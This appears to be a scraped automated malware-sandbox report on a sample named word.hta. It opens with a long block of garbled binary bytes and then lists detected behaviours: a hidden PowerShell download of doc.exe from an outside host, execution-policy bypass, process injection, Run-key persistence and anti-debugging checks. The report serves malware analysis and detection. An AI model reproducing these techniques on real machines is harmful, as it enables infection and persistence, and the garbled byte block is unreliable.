dÒXÂ9B2Å!÷²åå¶R8¸>aµ«$C®Gf+W#Þooß²¨ôVÛ=Û`<¼×?}KC¦¦©»i¤k"RùÆÁ)PÙSíxÁXCcN7Öé`ïÖÙîD´vÒbUGqNO2v±oè~÷ÉSÒX³ÄCï¸Íøà(/¹3G¾§0®ù`ö<;ú_ÏÐ5pïhËä&Exm"»t´-ü#ô-Øã«Ô0¹¿¿²Î·¦¹NåÆ³òZ®ÎÏZ5Ïia¬Å~§94A¡2SUúõÈ/c/+ëzý8ýè$Yé£×¤t¢ôÄ¥ö´OYe$?Ò ³Ý]Àù¯û20isR5W¹ºàö½7 ¬s¤üÎ½4ú¦bö9æòmú"e5ê¬x§Æ¼\¨ü/3¦¼Ï}bëËw±ª]eðÑ2/²ò}wíÚß=#¢)8ìÃæ/Y¶Cò§á"\XZê (êB!ÑKgÂ%©f®°)9O/Qf¡pÂ?ÂMÕ^²ÞºtÐ&ÌUAÐaLÂh®ïEh÷±ú÷T`'«kØÄ;yÜY©ëÎéíLÇkè>än24ôèÃgµ$bñ6×M~1(Û;}F"îql´ËgjFéíª 7fºè>äwË¬åÿyªÚ3g÷'þÌeâ5'Õ°-oB-ÆCQg¾;4(¥Ã$\LLÑËür0ÒQ{ðT÷}\|Bû¸PG Þþh¿Úö Â3uóS)ï+ Nu@eeÂÏÞòêë"> 76ì^;Nª>-÷ÀFÂæw¢V:;VáÊ¾ÍýAÄÅÃ©]p·¾+¡v403K¾Ôá½Z/ÜûÍëë$GÚH kBß7_>Ç$bÜNô w¹Í²Þ]¨Sløû¤b¯g[BàlQø´èLÈBO¨íª3OüÚRZíP¬4}»"qöçà{ Òx^âªê0v$²j&ÊL¥tø=rÛb<wà»eíâñSQÓ¨¥>9g-êÜô.·¯AMÝÑÊec6_`k³ÿËp»-ÑÇ7Ñýç;(6®¹É{gµî¢tßú.^ÃÐ¸ÓÆ^Ñeáz;æÚ!ñãä¹pgÃÕ]ôm·í;Þó&ª=.[@pHË`í@/So½ÓÓåu 7T5êûSh3ß¹èÑaCÓ$ºÀÕE²áõXÈjEWqMö[n?òK'ç}nyÝé®W&øVO¡}ÙC¼½drrl+7l:¬å&Æ¬e92ªð¾-ñEÍTlºv½¦aæ ¦_ñ7`v`²Ü)z Ó¦y;°ª7xÏ7yí_YÖì®v vÝ£ 9sç)\|ïÈJ}eì$ÉúïAÈÊ;8qvbµ1Ä3Y-¨ß78L]õÐJ;ÕÝ Ç4»kUI-y¥äåÎÅxz"{»Q\¯pQ ×«ôp¾\k=2ûLöð¸¸6ÈÿÈJÈ¶#öÙ%F ¢Ö~WÌÙX¬)&µö&MÏv ´ñêv7äÌ/çó '!é×åYËe8k0òJmàD=Ø d}]x:E%2K Z ¯dØ2ia[t,áÓªeLÑ¥¥=ÎÔÓD -v9N.§h;ag^ Ë éÖËUïö-Áon+Wº8º)îÜOGÏè;c¢ä£·Öê4rÛ¥Tª;¾Ô.ýzÛ¡uØpÀ¤¶¤×8ÊÄH_Ouì^´¹=½Hù@½).EÚã¯ÑM\üâJrh§ßÀêæïÞ>3µ]Bä+gÒê\wÏm¢Óó(úh4æÆ~lüKM"oÏÏÑ},Õ×ÑaQê!M0Æºî}«ºÜãôµÝ<~ý×Njé<ï ¸b$Ï[»Ú69ÜNØäáU&æF[b°âÚÓ*q0ÊÆÀÔ>½³É4©Ñ(:WÓ~Ã%AKE´T[á(õõAü´Ù4üùíËé¼ävb4¯ªö©Ê^T«Ä+F±ÿ!°x#Ëïÿ¡zö·<³BèmÛ×aÞÃö³þ´ÞÈ»ü'ya¦3,Þ\`qWWëa5¿ûÔ¦.IùåÖìâò{?ødéï¼u-LV12AwÔüò´zZ[ð'o\|!ôôQ(7åþ¦hTôtwu¡:®õëÜìi}ä6`Ü×ËTÒ{~Qh(Mt\|Âa56+\ìDäj®jm6\|pj¨îÿ"%ÓYõ¤i{¿Åqå£$+°¾ñbèÒ?W[Vè?pòô§`t,ìÒò

Poweshell is sending data to a remote host (1 event)

Data sent

GET /d/doc.exe HTTP/1.1 Host: docuserver1.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 24, 2021, 10:49 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://nsis.sf.net/NSIS_Error

Yara rule detected in process memory (10 events)

description	Escalate priviledges	rule	Escalate_priviledges
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe

reg_value

C:\Users\test22\AppData\Roaming\Temp\word.exe

Executes one or more WMI queries (1 event)

wmi	Select * from AntiVirusProduct

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send June 24, 2021, 10:49 p.m.	buffer: GET /d/doc.exe HTTP/1.1 Host: docuserver1.com Connection: Keep-Alive socket: 1420 sent: 74	1	74	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2672 called NtSetContextThread to modify thread in remote process 2704
NtSetContextThread June 24, 2021, 10:49 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4353015 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001e8 process_identifier: 2704	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1160 resumed a thread in remote process 2672
NtResumeThread June 24, 2021, 10:49 p.m.	thread_handle: 0x0000075c suspend_count: 1 process_identifier: 2672	1	0	0

Creates a suspicious Powershell process (6 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-w hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-w hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe

word.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All